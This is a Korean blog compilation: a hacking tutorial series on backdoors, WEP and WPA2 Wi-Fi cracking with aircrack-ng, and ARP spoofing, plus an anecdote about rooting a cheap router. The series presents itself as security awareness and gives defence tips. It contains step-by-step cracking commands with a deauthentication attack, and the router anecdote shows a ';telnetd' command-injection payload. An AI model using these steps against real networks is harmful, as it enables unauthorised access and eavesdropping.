이 사이트에 좋은거 많눼-0-^
http://jocker.tistory.com/163
여기도 대충
http://kldp.org/node/119302
왜 이런 포스팅을 하냐구요?
너무 쉽기 때문입니다.
인터넷을 조금만 찾아보면, 해킹하는 방법이 주르르 나옵니다.
각종 해킹툴과 해킹 강좌가 많아 어린애도 해킹할수 있을 정도로 쉽습니다.
그게 무슨뜻이냐구요?
나의 컴퓨터가 해킹당하기가 너무 쉽다는 뜻입니다.
많이 알면 많이 알수록 내가 해킹당하는게 얼마나 쉬운지 알게 됩니다.
그래서! 우리 함께 해킹을 배워보며 우리 자신의 컴퓨터 보안이 얼마나 허술한지 깨닫고 보완해보도록 하는게 이번 포스팅의 취지입니다.
1부는 간단하게 시작해보자는 차원에서, 많은분들이 알고 계시는 해킹툴과 백도어로 시작하겠습니다.
어릴때 처음 해킹에 관심을 가지고 알아보던중 알게되어, 시도해본 결과 놀랍도록 쉽게 성공했던 방법이지요.
과장 없이 말그대로 어린애도 할수있는 해킹입니다......
넷버스
스쿨버스
백오리피스
프로렛
서브세븐
네! 그렇습니다. 많은분들이 알고계시는 추억의 백도어 프로그램들입니다 ㅋㅋㅋㅋ
너무나도 많은분들이 알고 계시고, 사용법이 쉬운 관계로 딱히 설명할 필요는 없는것 같군요.
백도어란:
사용자가 바이러스가 걸린 프로그램들 다운받아 실행시키는것으로 시작됩니다.
이 프로그램은 각종 유틸,게임,음란물로 위장해 인터넷에 떠돌기도 하고, 해커들이 직접 피씨방을 돌아다니며 깔아두기도 합니다.
이 백도어 프로그램은 감염 컴퓨터에서 미리 지정된 포트로 서버를 열어 해커의 접속을 기다리거나, 혹은 미리 지정된 명령에 따라 정보 빼돌려서 전송, 등등의 역할을 합니다.
해커는 이렇게 감염된 컴퓨터에 너무나도 쉽게 접속해 각종 정보를 빼가거나,시스템을 장악해 여러 명령을 내릴수 있습니다.
그리스 로마 신화의 트로이목마 와 비교하여 트로이목마, 트로이,trojan 등으로 불리기도 하지요
워낙 유명해서 요즘은 모든 백신에 막히고, 또 라우터의 보급화 때문에 실전에서 사용하기가 무척 어렵다는 단점이 있지요.
그렇다면 안심해도 되느냐구요?
아닙니다. 위에 언급한 해킹툴은 구시대 유물이라 불가능합니다만, 컴퓨터 프로그래밍을 할줄 아는 사람이라면 이 모든 장벽을 뛰어넘는 백도어를 만드는게 별로 어렵지는 않기 때문입니다.
백신이요? 그거야 뭐 직접 만든 백도어가 널리 퍼지고 퍼져서 백신회사 귀에 들어가기 전까지는 걱정할 필요가 없습니다. 거기다 요즘은 백신이 알아채고 업데이트하는 시간에 맞추어 자기 자신의 코드를 변경해 자가 업데이트하며 백신으로부터 피해다니는 백도어 또한 존재합니다.
라우터요? 훗. 포트포워딩이라.. 어차피 서버를 열어 해커가 직접 연결할때만 필요한것이지, 정보를 빼돌린다거나 할때에는 아무런 장애도 안됩니다. 또 대놓고 백도어가 깔리면서 지가 알아서 포트포워딩을 해버리는것또한 가능하구요. 그게 아니라면 서버가 아니라 클라이언트로 활동하게 되면 라우터를 피할수 있습니다.
일례로,
[ARCHIEVES/Programming.관련] - [강좌] 네트워크 프로그래밍 - 에러 수정하였습니다.
를 활용하여, 채팅프로그램 대신 백도어를 만들수 있습니다. 백신에 안잡힙니다. 백도어를 클라이언트로 설정하고 미리 지정해둔 서버로 연결하게 하면 라우터도 아주 쉽게 바이패스 할수 있습니다. 그게 아니라면 미리 지정해둔 이메일 등으로 특정 폴더의 특정 파일을 전송할수도 있습니다.
그럼 우리가 백도어에 감염되는것을 피하기 위한 방어는 어떻게 해야 할까요?
- 우선 바이러스 백신을 깔아줍니다. 삐까뻔적한것보다 AVG 카스퍼스키 정도가 오히려 낫습니다.
- 윈도우 방화벽을 사용합니다. 의심가는 네트워크 연결을 차단하거나 유저에게 물어봅니다.
- 왠지 의심되는 프로그램은 깔지 않거나, sandbox 해줍니다.
- 윈도우 보안 업데이트 시키는대로 자주 해줍니다.
- 필요를 느끼신다면, 네트워크 감시 프로그램등으로 어떤 프로그램이 어떤 포트를 어떻게 사용하고 있는지 감시할수 있습니다.
- 아무리 내 개인 컴퓨터라도, 중요 정보는 아무렇게나 내버려두지 말고 특수 관리를 해줍니다. (암호화, 등등)
- 내 컴퓨터가 감염될수 있다는 사실을 자각하시고, 항상 주의하세요. 컴퓨터 할때마다 불안에 떨 필요는 없지만 너무 안일한 태도는 좋지 않습니다.
1부인 만큼 여러 분들이 이미 접해보셨을 주제를 선택했습니다.
해킹툴이 이슈가 되었던 적이 여러번이라 워낙 뒷북인 느낌이 없잖아 있습니다만, 차근차근 좀더 요즘 실질적인 위협이 되고 있는 주제로 넘어가겠습니다.
악용하시는분들에 대한 책임은 지지 않습니다
1부에서는 백도어에 대해 알아보았습니다.
말 그대로 알아만 보았습니다.
한건 없고 알아만 보았습니다.
[조커와 함께 해킹을] - 조커와 함께 배우는 해킹 -1부 해킹툴과 백도어
2부에서는 확! 건너뛰어서 라우터/유무선공유기 해킹에 대해 얘기해볼까 합니다.
1부 백도어가 좀 더 직접적으로 개인정보에 악영향을 줄수 있는게 확연히 보였던 반면,
라우터 해킹은 일단 그 자체로서는 수위가 덜하다고 보여질수도 있습니다.
뭐, 어찌보면 겉보기에 일단은 옆집 인터넷 훔쳐쓰는 정도니까요. (과연 그럴까요? 아닙니다! 백도어보다 훨씬 위험할수 있습니다)
요즘 세상에 여러분 모두 라우터를 비밀번호조차 걸어두지 않고 사용하시는분들은 없을거라 믿습니다.
나 인터넷 별로 안하는데 옆집이랑 나눠쓰지 뭐 허허...가 아닙니다!!! 모르는사람에게 라우터 사용을 허락하시면 개인정보 보호에 취약해집니다.
정확한 이유는 3부에서 알려드리겠습니다만, 한번 더 언급하자면,
바이러스 백신 깔고 방화벽 켜고 어쩌고 저쩌고 하는것보다 20배는 더 중요한게 개인 라우터 보호입니다.
자, 그럼 라우터 해킹을 본격적으로 시작해보도록 하겠습니다 (응?)
1부에서 언급했다시피, 제가 해킹 강좌를 올리는 이유는 좀 더 많은분들께 허술한 보안상태의 위험을 알리기 위해서랍니다.
해킹을 배우다보면 "헐... 내컴도 완전 허술하구나.. 그 누구라도 마음만 먹으면 내컴 뚫는건 시간문제로구나..." 라는걸 깨닫게 됩니다.
그리고 자기가 알아낸 해킹법으로 부터 안전할수 있도록 대비하게 되지요.
제 의견으로는, 많은 분들이 해킹법을 알면 알수록, 해킹에 대한 피해를 최소화 할수 있다고 생각합니다.
악용하시는분들에 대한 책임은 지지 않습니다
요즘 라우터 비밀번호의 대표적인 방식은 크게 두가지가 있습니다.
WEP 과 WPA/WPA2 이지요.
요즘 나오는 대부분의 라우터는 이 두가지는 최소한 기본적으로 지원하고 있습니다.
오늘 해킹해볼 방식은 WEP 입니다.
다른말로 하자면, 라우터 보안은 WPA2를 사용하세요! WEP는 뚫립니다!
얼마나 쉽게 뚫리는지 알아볼까요?
저는 리눅스를 기준으로 설명하겠습니다만, 윈도우에서도 가능한것으로 알고 있습니다.
우선, 몇가지 준비가 필요합니다.
1. 프로그램이 필요합니다. Aircrack-ng 라는 프로그램인데요.
http://www.aircrack-ng.org/ 에서 받을수 있습니다.
2. 무선랜카드가 Injection이 가능한 칩을 사용하는 기종이어야 합니다. 최근것은 거의 다 가능한것 같습니다.
3. 무선랜카드 Injection이 가능한 드라이버가 깔려있어야 합니다. 이것도 왠만하면 이미 깔려있다고 보시면 됩니다.
2번과 3번은 각자 알아서 하십쇼 ㅋㅋㅋ;; (아 이래도 되는걸까)
실제로 도움을 드리긴 어려운 부분이고, 각자 자신의 칩에 대해 조사해보셔야 합니다.
혹은, 그냥 대놓고 따라해보시고 아싸! 된다! 혹은 아썅! 안된다! 하시면 됩니다.
시작해봅시다.
일단 이론을 설명하자면....
무선공유기에게 끊임없는 ARP Request 를 보내 얻는 IV를 모아서 그 패턴을 분석해 비밀번호를 찾을수 있습니다.
ARP (Address Resolution Protocol)란 공유기시스템이 아이피 주소와 맥주소를 맵핑시킬때 사용되는 프로토콜입니다.
어떤 호스트가 physical address를 얻기 위해서 시스템에접 ARP Request를 보내면, 해당 주소를 가지고 있는 호스트가 대답해서 physical address를 불러주는 방식입니다.
ARP는 여러 해킹공격에 널리 이용된는 프로토콜중 하나입니다.
공유기에 ARP Request를 보내게 되면 공유기가 IV로 대답을 합니다. 이 IV를 여러개 (엄청많이) 모으게 되면 그 사이의 패턴 분석을 통해 키를 알아내게 되는것 입니다.
복잡하죠? 이론은 몰라도 됩니다. 저도 햇갈립니다.
우리는 전문 해커가 아니니까요. 되는 방법만 알면 되지 어떻게 되는지 알필요 있겠습니까.. ㅋㅋ
따라해보실때에는 본인 공유기를 대상으로 하시거나 주인의 동의를 얻어 교육용으로 실습해보세요.
옆집꺼 해킹하는건 불법이랍니다.
1. 무선 인터페이스를 Monitor모드로 작동시킵니다.
airmon-ng start wlan0
여기서 wlan0는 자신의 무선인터페이스입니다. ath0 wifi0 등등 시스템/랜카드에 따라 다를수 있습니다.
airmon-ng
를 쳐보시면 현재의 인터페이스 이름을 보실수 있습니다. 이미 monitor 모드가 시작된 경우 mon0 라는 인터페이가 추가로 보입니다.
2. 인젝션 테스트
aireplay-ng -9 -e jocker -a 00:12:34:56:78:90 mon0
뜻:
-9 : 인젝션 테스트
-e jocker : 공유기 이름
-a 00:12:34:56:78:90 : 공유기 맥주소
mon0 : 모니터모드 인터페이스
공유기 맥주소를 모르시면
airodump-ng mon0
를 이용해 근처 공유기 정보를 볼수 있습니다.
이 커맨드를 사용하면 터미널이 트랩되므로 필요한 정보 획득 후에는 ctrl+c 를 눌러 종료시키시면 됩니다.
결과는 이런식으로 떠야 합니다.
09:23:35 Waiting for beacon frame (BSSID: 00:12:34:56:78:90) on channel 9 09:23:35 Trying broadcast probe requests... 09:23:35 Injection is working! 09:23:37 Found 1 AP 09:23:37 Trying directed probe requests... 09:23:37 00:12:34:56:78:90 - channel: 9 - 'jocker'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73 09:23:39 30/30: 100%
마지막 줄이 100%나 거의 100% 근처가 아니라면 공유기에서 너무 멀리 떨어져있다는 뜻이구요 0%라면 인젝션이 안되는 랜카드 혹은 드라이버라는 뜻입니다.
3. Airodump-ng 를 실행해서 IV 캡춰 시작
airodump-ng -c 9 --bssid 00:12:34:56:78:90 -w dump mon0
뜻:
-c : 공유기 채널
--bssid 00:12:34:56:78:90 : 공유기 맥주소
-w dump : dump라는 파일명으로 저장
mon0 : 모니터용 인터페이스
결과:
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:12:34:56:78:90 42 100 5240 178307 338 9 54 WEP WEP jocker BSSID STATION PWR Lost Packets Probes 00:12:34:56:78:90 00:11:22:33:44:55 42 0 183782
4. 공유기 인증 얻어내기
위의 창 돌리는상태에서 새 터미널 실행.
aireplay-ng -1 0 -e jocker -a 00:12:34:56:78:90 -h 00:11:22:33:44:5 mon0
뜻:
-1 : (가짜)인증받으라는뜻
0 : 딜레이시간
-e jocker : 공유기이름
-a 00:12:34:56:78:90 : 공유기 맥주소
-h 00:11:22:33:44:55 내 맥주소
mon0 : 모니터인터페이스
결과:
18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful :-)
5. ARP 따발총 쏘기
aireplay-ng -3 -b 00:12:34:56:78:90 -h 00:11:22:33:44:55 mon0
뜻:
-3 : 따발따발
-b : 이정도 했으면 아실거에요
-h : 이것도 위에랑 같애요
mon0 : 이것도요
결과:
Saving ARP requests in replay_arp-0321-191525.cap You should also start airodump-ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
페킷숫자가 쭉쭉 올라갑니다.
동시에 airodump 실행시키고있는 터미널에서는 공유기 통신량이 확 올라간걸 보실수 있습니다.
#/s 가 300-400 이상이면 잘 되고 있는겁니다.
6. 분석해서 키 얻기
새 터미널 켜시고
aircrack-ng -b 00:12:34:56:78:90 dump*
뜻:
-b : 공유기맥주소
dump* : 아까 적었던 저장파일 이름
IV가 충분하다면 키를 얻을수 있습니다.
IV가 모자라서 실패하면 모일때까지 좀 기다려주셨다 다시 시도 하셔야 할수도 있습니다. 보
통 64비트 암호는 약 25만개, 128비트 암호는 약 150만개 정도 있으면 된다고 하지만..... 뭐.....
제 경험으론 리플레이 시키고 한 30초 있다 분석 시작하시면 64비트는 거의 바로 나오구요.
128비트는 커피한잔 하시고 오시면 나옵니다.
여기까지 따라하시고 안되시는분들도 계실수 있습니다.
해킹이라는게 명령어 시키는대로 적어서 다 되는게 아니니까요.
시스템에 따라 다르기도 하고 상황에 따라 다르기도 하구요
하지만 기본은 이런 방식이구요. 따라하시면 왠만하면 뚫립니다.
편집안된 3분48초짜리 비디오입니다. 이 시간이면 뚫습니다.
방어합시다:
- 공유기 암호 꼭 걸어둡니다
- WEP를 쓰지 않습니다. WPA2를 사용합시다
- 꼭 써야한다면 128비트로 합시다.. 아니, 그냥 아무래도 쓰지 않는게 좋겠습니다.
- WEP를 쓰지 않습니다
- WEP를 절대 쓰지 않습니다
- 무슨일이 있어도 WEP를 쓰지 않습니다
- WEP는 그냥 쓰지 않습니다. 절대. 네버 포에버.
악용하시는분들에 대한 책임은 지지 않습니다
2부 전편에서는 WEP방식 공유기 비밀번호가 얼마나 쉽게 크랙되는지 알아보았죠.
[조커와 함께 해킹을] - 조커와 함께 배우는 해킹 -2부 유무선공유기 해킹 1/2
그렇다면 WPA2방식은 얼마나 안전할까요?
요즘 가장 보편화된 방식입니다. 95%의 개인 공유기는 WPA2로 인코딩되었습니다.
WPA2만 간단히 깰수 있다면 전세계 개인공유기 95%는 깬다는 뜻이죠.
결론부터 말씀드리자면, 가능합니다.
WPA2도 뚫립니다
다만, WEP처럼 쉽게 뿅뿅 뚤리지는 않습니다.
현재 알려진 해킹 기술로 WPA2를 뚫기 위해서는 BRUTE FORCE 방식, 혹은 DICTIONARY 방식으로 공격해야 합니다.
좀 더 쉽게 얘기하자면, 될때까지 이것저것 넣어본다는 뜻입니다.
웹툰 한국식 보안 상황에서 살아남는법 中
Brute Force 는 무식하게 힘으로 해결한다 라는 뜻입니다.
이름 짓는 센스 하나는 끝내줍니다. ㅋㅋ
어쨌든 이름에서 알수있다시피, 많이 무식한 방법이지요.
가장 많이 사용되는 8글자 패스워드위 경우 영문 대소문자, 숫자, 기호 까지 포함되어있다고 쳤을때 약 58년 이 소모됩니다
이 링크에 가시면 소모 시간 계산기가 있습니다.
우리가 WPA2를 뚫기 위해서는 약 60년만 컴퓨터 돌리고 있으면 나온다는 뜻입니다.
(우리는 전문 해커가 아니니 위의 웹툰에서처럼 그래픽카드 모딩과 분할작업은 하지 않는다고 칩시다.)
참 쉽죠잉?
.
..
...
네... 음... 흠흠..
그래서 나온 방법이 Dictionary Attack, 즉 사전공격 되겠습니다.
웹툰 한국식 보안 상황에서 살아남는법 中
말이 password querty 저따위지, 일례로 어떤 해커가 만들어 배포한 데이터베이스는 27기가입니다.
사람들이 넣어볼만한 암호를 목록으로 만들어둔게 27기가... 흠..
8글자 단어 하나에 32바이트가 사용됩니다.
약 905,969,664 개의 단어가 미리 준비되어있는 셈입니다. 1조 에 가깝네요.
당신이 사용하는 비밀번호가 이 단어중 하나라면, 확률이 상당히 높습니다만, 60년동안 기다릴 필요 없이 바로 뚫리는겁니다.
오늘 설명해볼 방식은 이 데이터베이스를 이용한 사전공격입니다.
1부에서 언급했다시피, 제가 해킹 강좌를 올리는 이유는 좀 더 많은분들께 허술한 보안상태의 위험을 알리기 위해서랍니다.
해킹을 배우다보면 "헐... 내컴도 완전 허술하구나.. 그 누구라도 마음만 먹으면 내컴 뚫는건 시간문제로구나..." 라는걸 깨닫게 됩니다.
그리고 자기가 알아낸 해킹법으로 부터 안전할수 있도록 대비하게 되지요.
제 의견으로는, 많은 분들이 해킹법을 알면 알수록, 해킹에 대한 피해를 최소화 할수 있다고 생각합니다.
악용하시는분들에 대한 책임은 지지 않습니다
따라해보실때에는 본인 공유기를 대상으로 하시거나 주인의 동의를 얻어 교육용으로 실습해보세요.
옆집꺼 해킹하는건 불법이랍니다.
준비:
자, 이전편과 마찬가지로 Aircrack-ng 가 필요합니다.
사전 데이터베이스도 필요합니다.
http://safe-linux.com/ 에서 배포하고 있습니다만.... 트래픽 제한때문에 속도가 개판입니다.
돈을 내면 트래픽을 풀어준다고 하는데,,, 알아서 하십쇼.
700메가 버젼, 2기가 버젼, 27기가 버젼이 있습니다. 물론 들어잇는 단어 수의 차이입니다.
지난회에서 많은 설명을 했기 때문에 중복되는부분은 설명없이 넘어가겠습니다.
1번. 모니터모드 실행
airmon-ng start wlan0
2번. airodump 캡춰
airodump-ng -w dump --bssid 00:12:34:56:78:90 -c 9 mon0
3번. aireplay를 이용해 현재 통신중인 컴퓨터를 인증해제시킵니다.
새 터미널입니다:
이번에는 많은 양의 IV 대신 비밀번호를 알고있는 컴퓨터와 공유기와의 로그인 프로세스(전문용어로 Handshake, 악수) 를 따와야 합니다.
그러기 위해 통신중인 컴퓨터를 인증해제 시키면, 자동으로 공유기와 컴퓨터가 다시 인증과정을 거치게 되고, 우리는 미리 실행시킨 airodump로 따올수 있는겁니다.
aireplay-ng --deauth 1 -a 00:12:34:45:78:90 -c 00:11:00:11:00:11:00 mon0
-c 00:11:00:11:00:11:00 : 현재 정상통신중인 컴퓨터 맥주소 (희생양)
4번. 제대로 handshake 따오는데 성공하였는지 airodump로 확인
아래에 빨간색으로 표시된 부분이 생깁니다.
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:12:34:56:78:90 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:12:34:56:78:90 39 100 51 116 14 9 54 WPA2 CCMP PSK jocker BSSID STATION PWR Lost Packets Probes 00:12:34:56:78:90 00:11:00:11:00:11 35 0 116
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:12:34:56:78:90 39 100 51 116 14 9 54 WPA2 CCMP PSK jocker BSSID STATION PWR Lost Packets Probes 00:12:34:56:78:90 00:11:00:11:00:11 35 0 116
5번. aircrack을 사용해서 사전공격 시작
aircrack-ng dump* -w ./wordlist.lst
dump* : 캡춰한 파일 이름
./wordlist.lst : 사용되는 사전 데이터베이스 폴더와 이름
6번. 기다려서 뚫리나 안뚫리나 봅니다.
이번에도 상당히 간단한 방법이었습니다. (준비과정은 좀 복잡했지만..)
비록 사전공격이라고는 하나 데이터베이스가 클 경우 상당한 시간 이 소요될수 있습니다. (60년은 아닙니다)
동영상 시연입니다.
어떻습니까? 할만한가요?
저는 못해먹겠더라구요. 오래걸리고 에러나고...
하지만 확실한건, 가능하다는거, 딱히 어렵지는 않다는점 입니다.
그동안 해킹 강좌가 갑자기 뚝. 끊겼었죠.. ㅎㅎ;;
공유기해킹을 끝내고 바로 중간자공격, 패킷스니핑, 쿠키활용까지 나갈 예정이었습니다.
이렇게 다 하고 나면 SSL을 사용하지 않는 홈페이지 정도는 간단히 해킹이 가능하게 됩니다.
공유기 해킹까지는 직접적으로 악용될 소지가 그리 많지 않아 고민 없이 공개했습니다만,
중간자공격(이하 MITM) 이상은 악용될 소지가 상당히 많습니다.
주위에서도 강좌를 말렸고 저도 생각해보니 다음과 같은 끔찍한 상황이 상상되어 강좌 쓰는것을 주저하고 있었습니다.
MITM 공격도 종류가 다양하지만 오늘 얘기하게될 공격은 ARP Spoofing 입니다.
같은 공유기를 사용하는 다른 컴퓨터의 네트워크 통신을 들여다 보게 됩니다.
분명 이 강좌를 보고 나면 해보고싶어지실텐데, 같은 공유기를 사용한다면 가족이나 룸메겠지요.
우리 모두 가족/친구간의 사생활을 침범하는 상황이 없도록 합시다. 제3자를 해킹하는것보다 훨씬 더 치명적인 결과가 옵니다.ㅠㅠ
고로 기대하시는분들께는 죄송하지만 앞으로는 실제 사용되는 툴이나 직접적으로 하는 단계별 방법이 아닌,
이론 위주로 강좌를 진행하겠습니다.
1부에서 언급했다시피, 제가 해킹 강좌를 올리는 이유는 좀 더 많은분들께 허술한 보안상태의 위험을 알리기 위해서랍니다.
해킹을 배우다보면 "헐... 내컴도 완전 허술하구나.. 그 누구라도 마음만 먹으면 내컴 뚫는건 시간문제로구나..." 라는걸 깨닫게 됩니다.
그리고 자기가 알아낸 해킹법으로 부터 안전할수 있도록 대비하게 되지요.
제 의견으로는, 많은 분들이 해킹법을 알면 알수록, 해킹에 대한 피해를 최소화 할수 있다고 생각합니다.
악용하시는분들에 대한 책임은 지지 않습니다
ARP : Address Resolution Protocol (주소 결정 프로토콜)
ARP Spoofing (혹은 ARP Poisoning) : 이 프로토콜을 공격해서 주소간의 연결을 바꾸는 방법입니다.
일반적인 통신의 경우 각 컴퓨터와 공유기가 통신하여 인터넷(혹은 다른 PC)와 정보교환이 이루어집니다.
하지만 ARP를 공격해 이렇게 설정을 바꾼다고 가정합시다:
A 컴퓨터에 저장되어있는 공유기주소를 B 컴퓨터 주소로 바꿉니다
공유기에 저장되어있는 A 컴퓨터 주소를 B 컴퓨터 주소로 바꿉니다.
A 컴퓨터가 인터넷에 접속할때 공유기 대신 B컴퓨터로 정보를 보내게 됩니다.
B 컴퓨터는 받은 정보를 다시 공유기에 넘겨줍니다.
반대로 공유기에서 A 컴퓨터로 가는 통신도 B 컴퓨터를 거쳐가게 됩니다.
A 컴퓨터는 평소처럼 아무 문제없이 정보를 보내고 받습니다.
공유기도 평소처럼 A컴퓨터와 통신합니다. (바뀐 주소로)
B는 A가 인터넷으로 뭘 하는지 지켜볼수 있습니다.
이게 바로 ARP Spoofing 입니다.
간단하죠? 공격하는것도 간단합니다.
당하는사람은 모릅니다. (전문가가 의심을 하고 확인을 하면 통신중인 주소가 바뀌었다는것은 알수 있지만, 일반적인 유저는 전혀 알수 없습니다.)
위의 설명대로 자세한 방법과 툴이름은 생략하겟습니다만,
리눅스용 유명~한 툴을 사용하면 키보드 툭툭툭 치면 공격 끝나는겁니다.
윈도우용은 더 쉽습니다. 클맄클맄클맄 하면 끝납니다.
그러고 나면 피자시켜놓고 아이디와 패스워드를 치길 기다리기나 하면 된다는거죠..
- APR Spoofing 을 당하더라도 피해가 덜하도록 암호화된 통신을 합시다. (SSL)
- 특히 은행업무등 중요한일의 경우 SSL이 사용되는지 꼭 확인합니다 (웹주소 옆의 자물쇠)
- 요즘은 구글등의 이메일이나 SNS도 SSL 을 지원하는곳이 많습니다.
- Facebook의 경우 세팅에 가서 직접 "SSL사용" 을 체크해주셔야 합니다.
- 무엇보다 공유기관리를 잘 해서 제3자와 공유기를 공유하지 맙시다.
- 커피숍 등에서 은행업무 보지 말라는것도 바로 이런 이유입니다.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
간만의 글이지만.. 인사 생략하고..
아이피타임 살 정도도 안되는 가난함의 압박을 받던중
저 콭똵찌만한 유무선 공유기를 9,800원에 팔고 있길래 냅다 질렀다.
근데 외관 이쁘고 사이즈작고 다 마음에 드는데
내가 무선공유기를 사려고 했던 이유는..
WiFi를 LAN이 아닌 WAN으로 연결하려고 했던거였는데
이거 기본펌웨어에서 지원을 안한다.
아 싼게 비지떡이라고
아이피타임은 되는데...
9,800원이 아까워서 환불해달라고 개 지랄을 할수도 있었지만..
생긴게 맘에들어서 루트를 따보기로 했다.
혹시 머 숨겨놓은 기능같은거 있을거같아서..
일단 텔넷이라도 열고 싶었는데..
보아하니 busybox같은건 당연 있을거같고..
자기네들도 A/S해야하니 telnetd는 기본으로 넣어 컴파일을 했을것이다.
물론 기본적으로는 접속이 안된다.
관리자페이지에 보면 원격 호스트에 ping을 때려볼 수 있는 기능이 있다.
호스트명을 입력하면 결과가 아래 텍스트박스에 나오는 페이지인데..
호스트명에 SQL인젝션도 아니고 쉘 명령어 인젝션이 되는게 아닌가!!
호스트명에 localhost같은거 대신에 ;telnetd 만 입력해주면 텔넷서버가 뜬다..
오예 이상태에서 텔넷 들어가니 들어가진다.
아디 패스워드 물어보는데 관리자페이지 아이디 패스워드랑 동일하다..
대충 둘러보는데 Ralink SoC칩이란다.
그래서 뜯어봤다. 만만할거같아서.
씨퓨+무선랜이 원칩으로 되어있고, 플래시메모리 4메가, 램 16메가 달려있었다.
존내 구굴질 하다 보니 이놈 펌웨어는 Ralink AP SDK로 만들어졌다는 사실을 알 수 있었다.
그래서 또 존내 구굴질 해서 AP SDK 약간 구버전을 입수했다. (당시 검색을 담당한 컴퓨터는 악성코드의 총체적 똥밭이 되었다)
어쨋든 입수했다.
커널+라이브러리+비지빡스+잡동사니 유틸+부트로더+크로스컴파일러 로 구성된 전형적인 임베디드 SDK이다
이제 루트권한을 거의 딴거나 마찬가지!!
기본 옵션으로 SDK를 빌드하니 펌웨어 이미지가 떨어졌다.
자 이거 어케 굽느냐가 관건이다.
머 미친듯이 ls해서 관련된 유틸 찾으면 된다.
mtd_write라는 프로그램하고 /proc/mtd 이런거 잘 찾아보면 어따 구워야되는지 감이온다
이미지를 ftpget명령어로 램디스크 아무데나 가져와서 mtd_write로 구워준다
재부팅한다
새 펌웨어가 적용되었다.
기본적으로 지원되는 공유기모드, 브릿지모드 외에 이더넷컨버터(내가원하던기능), AP클라이언트 기능이 추가되었다!!
AP클라이언트는 생각지도 못한 기똥찬 기능인데
같은 채널에 내 AP를 만들고 같은 채널의 다른 AP에 WAN으로 붙어서 브릿지나 공유기를 구성할 수 있다.
다시말해 남의 무선랜에 붙어서 내 AP 하나 더 만든다는 이야기 되겠다.
문제는 같은 채널이어야 한다는점. 내가 붙을 AP가 어느채널 쓰는지 미리 알아놔야한다
여튼 임베디드 장비를 구입하는것은 노예가 되는 것이요,
루트 권한을 딴 것은 절반을 소유한 것이요,
RS-232 시리얼 포트를 연결하여 부트로더에 접근할 수 있는것은 모든것을 얻은 것이라는 이야기가 있다. (믿거나말거나)
시리얼 포트를 연결해야되는데
이것도 임베디드 장치의 PCB를 그려본사람은 시리얼 포트를 감으로 찾을 수 있다.
이거 뜯으면 정중앙에 핀 4개가 솟아있는데
두개는 전원이고 두개는 신호핀이다
보통 PCB에서 그라운드면하고 굵은패턴에 물린 핀은 전원이라보면 된다.
디바이스마트같은데 가면 참 친절하게도 4핀 TTL신호를 RS-232레벨로 바꿔주는 키트를 판다
엏머 고맙기도하여라
그런데 핀배열마저 딱 맞으니 이거 참 땡큐가 아닐 수 없다.
머 핀배열 안맞으면 해더핀 뽑아서 바꿔주면 된다.
Tx/Rx핀을 구별하는 방법은 Tx핀은 임피던스가 낮고 Rx핀은 임피던스가 높다는 점을 이용하면 테스터기만 가지고도 알 수 있다.
이도저도없으면 LED하나 희생시키면 된다.
netween에서 RT305x칩을 사용하여 만든 공유기 시리즈는 거의 다 같은 방법으로 탈옥(?)된다고 보면 된다.
머 아이피타임것도 비슷한 방법으로 될거같긴한데 아이피타임은 펌웨어를 너무 성의있게 만들어서 털고싶은마음이 안생긴다
네트윈은 애꿎은 아이피타임 까지말고 펌웨어좀 성의있게 만들었으면 좋겠다 ㅆㅂ
내가 이짖까지해야되냐~
'wif LiNoUz > SERVER' 카테고리의 다른 글
성능모니터링 (2) | 2014.01.13 |
---|---|
router add 다중 네트워크 (3) | 2013.03.25 |
Nonpaged and apged pool error (1) | 2013.02.07 |
성능모니터 DB로 쑤셔넣기 (0) | 2013.01.11 |
성능모니터 관리 중요 카운터들 (0) | 2013.01.11 |